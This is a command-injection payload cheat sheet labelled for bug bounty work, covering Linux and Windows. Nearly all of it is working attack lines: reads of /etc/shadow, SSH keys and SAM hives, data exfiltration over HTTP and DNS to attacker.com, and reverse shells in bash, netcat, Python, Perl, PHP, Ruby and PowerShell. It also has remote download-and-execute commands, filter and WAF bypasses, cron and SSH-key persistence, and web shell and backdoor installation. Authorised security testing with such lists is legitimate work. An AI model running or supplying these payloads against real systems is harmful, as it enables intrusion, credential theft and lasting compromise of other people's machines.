# Command Injection Payloads (2020-2025 Enhanced Bug Bounty Edition) # ============================ # BASIC COMMAND INJECTION # ============================ # Command Separators ; ls | ls || ls & ls && ls `ls` $(ls) %0a ls \n ls # Chained Commands ; whoami | whoami || whoami & whoami && whoami # Command Substitution `whoami` $(whoami) ;`whoami` ;$(whoami) $((whoami)) # ============================ # LINUX/UNIX COMMANDS # ============================ # File Operations ; cat /etc/passwd | cat /etc/passwd ; cat /etc/shadow | cat /etc/shadow ; ls -la / | ls -la / ; head -n 50 /etc/passwd ; tail -n 50 /var/log/auth.log # System Information ; uname -a ; hostname ; id ; whoami ; pwd ; env ; set ; printenv ; cat /proc/version ; cat /etc/issue ; cat /etc/*-release ; ifconfig ; ip addr ; route -n ; netstat -tulpn ; ps aux ; w ; last # File Discovery ; find / -name "*.conf" 2>/dev/null ; find / -name "config*" 2>/dev/null ; find / -name "*password*" 2>/dev/null ; find / -perm -4000 2>/dev/null ; locate password ; locate admin ; which gcc ; which python ; which perl # Reading Sensitive Files ; cat ~/.bash_history ; cat ~/.ssh/id_rsa ; cat ~/.ssh/authorized_keys ; cat /var/www/html/config.php ; cat /var/www/html/wp-config.php ; cat /etc/apache2/apache2.conf ; cat /etc/nginx/nginx.conf ; cat /root/.ssh/id_rsa # ============================ # WINDOWS COMMANDS # ============================ # Basic Commands & dir | dir & dir C:\ & type C:\Windows\win.ini | type C:\boot.ini & whoami | net user & hostname & ipconfig & systeminfo # Windows System Info & systeminfo & wmic qfe list & wmic logicaldisk get caption & net user & net localgroup administrators & net user /domain & net group /domain & net group "Domain Admins" /domain & tasklist & netstat -ano & ipconfig /all & route print & arp -a # Windows File Operations & type C:\Users\Administrator\Desktop\passwords.txt & dir C:\Users\ & dir C:\inetpub\wwwroot\ & type C:\Windows\System32\drivers\etc\hosts & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" # PowerShell Commands & powershell Get-Process & powershell Get-Service & powershell Get-NetIPConfiguration & powershell Get-ComputerInfo & powershell Get-LocalUser & powershell Get-LocalGroup & powershell Get-ChildItem C:\ -Recurse -Include *.txt,*.doc,*.pdf -ErrorAction SilentlyContinue & powershell -c "Get-Content C:\Users\Administrator\Desktop\passwords.txt" # Windows Credential Dumping & reg save HKLM\SAM C:\temp\sam.hive & reg save HKLM\SYSTEM C:\temp\system.hive & reg save HKLM\SECURITY C:\temp\security.hive # ============================ # TIME-BASED BLIND INJECTION # ============================ # Linux ; sleep 5 | sleep 5 || sleep 5 & sleep 5 && sleep 5 ; sleep 10 `sleep 5` $(sleep 5) # Using ping for delay ; ping -c 5 127.0.0.1 | ping -c 10 127.0.0.1 || ping -c 5 localhost # Windows & timeout 5 | timeout 5 & timeout /t 5 & ping -n 5 127.0.0.1 | ping -n 10 127.0.0.1 & ping 127.0.0.1 -n 5 > nul # ============================ # OUTPUT REDIRECTION & EXFILTRATION # ============================ # Output to File ; ls > /tmp/output.txt | ls > /tmp/output.txt & dir > C:\temp\output.txt ; whoami > /var/www/html/whoami.txt ; cat /etc/passwd > /tmp/passwd.txt # Append to File ; ls >> /tmp/output.txt ; whoami >> /var/www/html/info.txt # Error Redirection ; ls 2>&1 ; cat /etc/shadow 2>/dev/null ; find / -name "*.conf" 2>/dev/null # Data Exfiltration via HTTP ; curl http://attacker.com?data=$(whoami) ; wget http://attacker.com/exfil?data=$(cat /etc/passwd | base64) ; curl -d "data=$(cat /etc/passwd)" http://attacker.com/collect & powershell -c "Invoke-WebRequest -Uri http://attacker.com?data=$(whoami) -Method GET" # DNS Exfiltration ; nslookup $(whoami).attacker.com ; dig $(whoami).attacker.com ; host $(whoami).attacker.com # ============================ # ENCODING & OBFUSCATION # ============================ # URL Encoding %3B%20whoami %7C%20whoami %26%20whoami %0a%20whoami %0d%0a%20whoami # Double URL Encoding %253B%2520whoami %257C%2520whoami # Unicode Encoding \u003b whoami # Hex Encoding \x3b whoami \x0a whoami # Octal Encoding \073 whoami # ============================ # NEWLINE INJECTION # ============================ %0a whoami %0d%0a whoami \n whoami \r\n whoami \r whoami %0awhoami %0d%0awhoami # ============================ # SPACE BYPASS TECHNIQUES # ============================ # No Space ;cat& /dev/tcp/ATTACKER_IP/PORT 0>&1 | bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 ; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' ; 0<&196;exec 196<>/dev/tcp/ATTACKER_IP/PORT; sh <&196 >&196 2>&196 # NC Reverse Shell ; nc -e /bin/sh ATTACKER_IP PORT ; nc ATTACKER_IP PORT -e /bin/bash ; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f # Python Reverse Shell ; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' # Perl Reverse Shell ; perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' # PHP Reverse Shell ; php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' # Ruby Reverse Shell ; ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' # Telnet Reverse Shell ; telnet ATTACKER_IP PORT | /bin/bash | telnet ATTACKER_IP SECOND_PORT # Windows PowerShell Reverse Shell & powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" # Windows CMD Reverse Shell & powershell IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1') # ============================ # REMOTE CODE EXECUTION (RCE) # ============================ # Download and Execute ; curl http://attacker.com/shell.sh | bash ; wget http://attacker.com/shell.sh -O- | bash ; curl http://attacker.com/exploit.py | python & certutil -urlcache -split -f http://attacker.com/shell.exe C:\temp\shell.exe & powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" # Execute In-Memory ; echo "curl http://attacker.com/payload" | bash & powershell -enc BASE64_ENCODED_COMMAND # ============================ # SYMBOLIC LINK ATTACKS # ============================ # Create Symlink to Sensitive Files ; ln -s /etc/passwd /var/www/html/passwd.txt ; ln -s /etc/shadow /tmp/shadow.txt ; ln -s /root/.ssh/id_rsa /var/www/html/key.txt ; ln -s /var/www/html/config.php /tmp/config.txt # Symlink to Directory ; ln -s /etc/ /var/www/html/etc ; ln -s /root/ /tmp/root ; ln -s / /var/www/html/rootfs # Symlink Overwrite ; ln -sf /etc/passwd /var/www/html/index.php ; ln -sf /dev/null /var/log/access.log # Race Condition with Symlink ; ln -s /etc/passwd target && cat target ; ln -s /etc/shadow /tmp/link && cat /tmp/link # Symlink Arbitrary File Read ; ln -s /etc/passwd public_html/passwd ; ln -s ~/.ssh/id_rsa web/key # Symlink in Archive Extraction (Zip Slip) ; ln -s /etc/passwd malicious_link ; tar -czf payload.tar.gz malicious_link # ============================ # BLIND COMMAND INJECTION DETECTION # ============================ # Time-Based Detection || sleep 5 & sleep 5 & ; ping -c 5 127.0.0.1 | timeout 5 # Out-of-Band (OOB) Detection ; curl http://burpcollaborator.net ; wget http://attacker.com/ping ; nslookup attacker.com ; ping attacker.com -c 1 & nslookup attacker.com # DNS-Based Detection ; nslookup $(whoami).attacker.com ; dig $(whoami).attacker.com ; host $(hostname).attacker.com # HTTP-Based Detection ; curl http://attacker.com/?id=injection ; wget http://attacker.com/?test=injection # ============================ # POLYGLOT COMMAND INJECTION # ============================ test;whoami test|whoami test||whoami test&whoami test&&whoami test`whoami` test$(whoami) test%0awhoami test\nwhoami # ============================ # ADVANCED FILTER BYPASSES (2023-2025) # ============================ # Whitespace Alternatives cat/etc/passwd {cat,/etc/passwd} X=$'cat\x20/etc/passwd'&&$X # Null Byte cat /etc/passwd%00 whoami%00 # Comment Injection cat /etc/passwd#comment whoami#comment cat /etc/passwd//comment # Using $PATH ${PATH:0:1}bin${PATH:0:1}cat ${PATH:0:1}etc${PATH:0:1}passwd # Using $HOME $HOME/../../etc/passwd # Glob Characters /???/c?t /???/p?ssw? # ============================ # WAF/IDS BYPASS # ============================ # Case Variations Cat /etc/passwd CAT /etc/passwd cAt /etc/passwd # Using Tabs cat%09/etc/passwd # Using Line Feed cat%0a/etc/passwd # Combining Techniques c''a''t${IFS}/e''t''c/p''a''s''s''w''d # ============================ # CONTEXT-SPECIFIC INJECTIONS # ============================ # In Email Field user@domain.com; whoami user@domain.com| whoami user@domain.com`whoami` # In Filename file.txt; whoami file.txt| cat /etc/passwd $(whoami).txt # In URL http://example.com/page?id=1; whoami http://example.com/page?id=1| cat /etc/passwd # ============================ # CRON JOB INJECTION # ============================ # Persistent Access ; (crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'") | crontab - ; echo "* * * * * curl http://attacker.com/shell.sh | bash" | crontab - # ============================ # SSH KEY INJECTION # ============================ # Add SSH Key for Persistence ; echo "ssh-rsa ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys ; mkdir -p ~/.ssh && echo "ssh-rsa ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys # ============================ # BACKDOOR INSTALLATION # ============================ # Web Shell Upload ; curl http://attacker.com/shell.php -o /var/www/html/shell.php ; wget http://attacker.com/backdoor.php -O /var/www/html/bd.php # Binary Download and Execute ; curl http://attacker.com/backdoor -o /tmp/bd && chmod +x /tmp/bd && /tmp/bd ; wget http://attacker.com/malware -O /tmp/malware && chmod +x /tmp/malware && /tmp/malware & # ============================ # PRIVILEGE ESCALATION CHECKS # ============================ # SUID Binaries ; find / -perm -4000 -type f 2>/dev/null ; find / -perm -u=s -type f 2>/dev/null # Sudo Permissions ; sudo -l ; cat /etc/sudoers # Writable Files ; find / -writable -type f 2>/dev/null ; find / -perm -222 -type f 2>/dev/null # ============================ # LOG POISONING # ============================ # Apache/Nginx Log Poisoning ; echo "" >> /var/log/apache2/access.log ; echo "" >> /var/log/nginx/access.log # ============================ # ENVIRONMENT VARIABLE MANIPULATION # ============================ ; export PATH=/tmp:$PATH ; echo $PATH ; printenv # ============================ # MODERN TECHNIQUES (2024-2025) # ============================ # Abusing Built-in Features ; source <(curl -s http://attacker.com/script.sh) ; eval "$(curl -s http://attacker.com/cmd.txt)" # JavaScript Command Injection (Node.js) ; node -e "require('child_process').exec('whoami')" # Using Alternative Shells ; sh -c whoami ; bash -c whoami ; zsh -c whoami ; ksh -c whoami # Exploiting Interpreters ; python -c "import os;os.system('whoami')" ; perl -e 'system("whoami")' ; ruby -e 'system("whoami")'